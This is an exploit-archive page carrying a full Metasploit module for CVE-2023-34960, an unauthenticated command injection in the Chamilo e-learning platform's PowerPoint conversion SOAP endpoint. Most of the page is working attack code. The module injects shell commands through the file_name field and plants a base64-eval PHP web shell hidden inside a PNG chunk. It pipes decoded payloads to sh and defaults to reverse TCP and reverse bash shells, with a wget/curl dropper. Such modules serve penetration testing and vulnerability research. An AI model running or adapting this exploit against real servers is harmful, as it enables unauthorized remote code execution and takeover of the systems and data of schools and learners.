what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Chamilo 1.11.18 Command Injection

Chamilo 1.11.18 Command Injection
Posted Aug 24, 2023
Authored by RandoriSec, h00die-gr3y | Site metasploit.com

This Metasploit module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions 1.11.18 and below. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at the OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.

tags | exploit, remote, arbitrary, php
advisories | CVE-2023-34960
SHA-256 | 9eddd6c9a39fb97ca77aeebd1ec713969953ce2f89e609c528b4a46ca5ec152d

Chamilo 1.11.18 Command Injection

Change Mirror Download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Format::PhpPayloadPng
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',
'Description' => %q{
Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability
that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
Due to a functionality called Chamilo Rapid to easily convert PowerPoint
slides to courses on Chamilo, it is possible for an unauthenticated remote
attacker to execute arbitrary commands at OS level using a malicious SOAP
request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
},
'Author' => [
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author
'Randorisec' # Original research
],
'References' => [
['CVE', '2023-34960'],
['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],
['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']
],
'License' => MSF_LICENSE,
'Platform' => ['php', 'unix', 'linux'],
'Privileged' => false,
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Targets' => [
[
'PHP',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Type' => :linux_dropper,
'Linemax' => 65535,
'CmdStagerFlavor' => ['wget', 'curl'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-06-01',
'DefaultOptions' => {
'SSL' => false,
'RPORT' => 80
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),
OptString.new('WEBSHELL', [
false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
], conditions: %w[TARGET == 0])
])
end

def soap_request(cmd)
# create SOAP request exploiting CVE-2023-34960

# Randomize ppt size
ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"

return <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns1="#{target_uri.path}"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ns2="http://xml.apache.org/xml-soap"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">#{ppt_size}</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS
end

def upload_webshell
# randomize file name if option WEBSHELL is not set
@webshell_name = if datastore['WEBSHELL'].blank?
"#{Rex::Text.rand_text_alpha(8..16)}.php"
else
datastore['WEBSHELL'].to_s
end

@post_param = Rex::Text.rand_text_alphanumeric(1..8)

# inject PHP payload into the PLTE chunk of a PNG image to hide the payload
php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
return nil if png_webshell.nil?

# encode webshell data and write to file on the target for execution
payload = Base64.strict_encode64(png_webshell.to_s)
cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"

return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end

def execute_php(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
@post_param => payload
}
})
end

def execute_command(cmd, _opts = {})
# Encode payload with base64 and decode with openssl (most common installed on unix systems)
payload = Base64.strict_encode64(cmd)
cmd = "echo #{payload}|openssl enc -a -d|sh"

return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end

def check
# Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.
print_status("Checking if #{peer} can be exploited.")
marker = Rex::Text.rand_text_alphanumeric(8..16)
res = execute_command("echo #{marker}")
if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)
CheckCode::Vulnerable
else
CheckCode::Safe('No valid response received from the target.')
end
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :php
res = upload_webshell
fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')
register_file_for_cleanup(@webshell_name.to_s)
execute_php(payload.encoded)
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager({ linemax: target.opts['Linemax'] })
end
end
end
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close